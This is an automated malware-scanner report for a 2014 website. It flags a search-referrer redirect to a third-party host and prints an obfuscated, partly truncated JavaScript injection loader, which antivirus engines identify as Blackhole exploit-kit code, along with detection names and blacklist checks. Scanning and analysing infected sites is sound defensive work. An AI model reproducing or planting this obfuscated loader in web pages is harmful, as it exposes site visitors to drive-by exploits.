New scan:

Malware Scanner report for media-aktuell-online.com

Malicious/Suspicious/Total urls checked
1/0/15
1 page has malicious code. See details below
Blacklists
OK
Malicious redirects
Found
The website redirects visitors from search engines to the 3rd-party URL:
->http://piopo.25u.com/
2727 websites infected.

The website "media-aktuell-online.com" is most probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues. Here is our redirects fixing guide.
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Malicious/Suspicious Redirects

RequestServer responseStatus
URL: http://media-aktuell-online.com/
(imitation of visitor from search engine)

GET / HTTP/1.1
Host: media-aktuell-online.com
Referer: http://www.google.com/search?q=redirect+check1
HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 23 Jun 2014 08:08:59 GMT
Location: http://piopo.25u.com/
Server: Apache/2.2.16 (Debian)
Vary: Accept-Encoding
Content-Type: text/html
X-Pad: avoid browser bug
X-Powered-By: PHP/5.2.17
malicious

Scanned pages/files

RequestServer responseStatus
http://media-aktuell-online.com/
200 OK
Content-Length: 35462
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

ww=window;try{document.body++}catch(dgsgsdg){zxc=1;}try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){zxc=0;}try{if(ww.document)window["doc"+"ument"]["body"]="asd"}catch(bawetawe){if(ww.document){v=window;try{fawbe--}catch(afnwenew){try{(v+v)()}catch(gngrthn){if("".substr)ev=eval;}
n=["9","9","45","42","17","1f","40","4b","3o","4h","49","41","4a","4g","1l","43","41","4g","2j","48","41","49","41","4a","4g","4f","2g","4l","39","3m","43","33","3m","49","41","1f","1e","3n","4
... 2486 bytes are skipped ...
,"41","45","43","44","4g","1e","1j","1e","1o","1n","1e","1g","29","d","9","9","9","40","4b","3o","4h","49","41","4a","4g","1l","43","41","4g","2j","48","41","49","41","4a","4g","4f","2g","4l","39","3m","43","33","3m","49","41","1f","1e","3n","4b","40","4l","1e","1g","3g","1n","3i","1l","3m","4c","4c","41","4a","40","2h","44","45","48","40","1f","42","1g","29","d","9","9","50"];h=2;s="";if(zxc)for(i=0;i-617!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],25));}z=s;if(ww.document)ev("if(1)"+z)}}}

Antivirus reports:

AntiVir
JS/BlacoleRef.W.77
Avast
JS:Blacole-DO [Expl]
Ikarus
Exploit.JS.Blacole
nProtect
Trojan.JS.Iframe.CNT
TrendMicro-HouseCall
JS_BLACOLE.SMAP
Comodo
TrojWare.JS.Agent.AXQ
CAT-QuickHeal
JS/IframeRef.DCC
McAfee-GW-Edition
JS/Exploit-Blacole.gc
TrendMicro
JS_BLACOLE.SMAP
Kaspersky
HEUR:Trojan.Script.Iframer
Microsoft
Trojan:JS/BlacoleRef.CM
MicroWorld-eScan
Trojan.JS.Iframe.CNT
Fortinet
JS/Crypt.BBDV!tr
Jiangmin
Trojan/Script.Gen
McAfee
JS/Exploit-Blacole.gc
NANO-Antivirus
Trojan.Script.Blackhole.bekghp
F-Secure
Trojan.JS.Iframe.CNT
VIPRE
Trojan.JS.BlacoleRef.cm (v)
AVG
HTML/Framer
Norman
Crypt.BJLT
GData
Trojan.JS.Iframe.CNT
BitDefender
Trojan.JS.Iframe.CNT

http://media-aktuell-online.com/account.php?XTCsid=sfna3troicdocirkndvpgi46d3
200 OK
Content-Length: 31285
Content-Type: text/html
clean
http://media-aktuell-online.com/account.php?XTCsid=23ivktca23i75hq1nit25ca7m7
200 OK
Content-Length: 31326
Content-Type: text/html
clean
http://media-aktuell-online.com/account.php?XTCsid=dumlqps6mdudrcghglargb41g4
200 OK
Content-Length: 31285
Content-Type: text/html
clean
http://media-aktuell-online.com/account.php?XTCsid=ak0qea09sdcmh0favd33hvt054
200 OK
Content-Length: 31285
Content-Type: text/html
clean
http://media-aktuell-online.com/account.php?XTCsid=i2spu4rsvbk0nhbb29om940lc6
200 OK
Content-Length: 31353
Content-Type: text/html
clean
http://media-aktuell-online.com/account.php?XTCsid=hkojsgl689mrnpbjvebvfe6os1
200 OK
Content-Length: 31285
Content-Type: text/html
clean
http://media-aktuell-online.com/account.php?XTCsid=n4vrsa8u9pkvpq2riu6gk84e80
200 OK
Content-Length: 31362
Content-Type: text/html
clean
http://media-aktuell-online.com/account.php?XTCsid=fvec1o92lai5fhvulmqsh21sl6
200 OK
Content-Length: 31362
Content-Type: text/html
clean
http://media-aktuell-online.com/account.php?XTCsid=fuv8lo6kp624ufcu1u28fitr03
200 OK
Content-Length: 31326
Content-Type: text/html
clean
http://media-aktuell-online.com/account.php?XTCsid=ok8u3q7teq06qanbq8a5mrq5h2
200 OK
Content-Length: 31326
Content-Type: text/html
clean
http://media-aktuell-online.com/account.php?XTCsid=guqu0u5827eu1v0bqo98l4ncb3
200 OK
Content-Length: 31285
Content-Type: text/html
clean
http://media-aktuell-online.com/account.php?XTCsid=ensikhi9mdj3q9irl47f3ot5m2
200 OK
Content-Length: 31362
Content-Type: text/html
clean
http://media-aktuell-online.com/account.php?XTCsid=ehbqgni4helm3g5reepf1se8k7
200 OK
Content-Length: 31285
Content-Type: text/html
clean
http://media-aktuell-online.com/account.php?XTCsid=usme40s34pk4cfhl3tv8o2iiu1
200 OK
Content-Length: 31350
Content-Type: text/html
clean

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=media-aktuell-online.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://media-aktuell-online.com/

Result: media-aktuell-online.com is not infected or malware details are not published yet.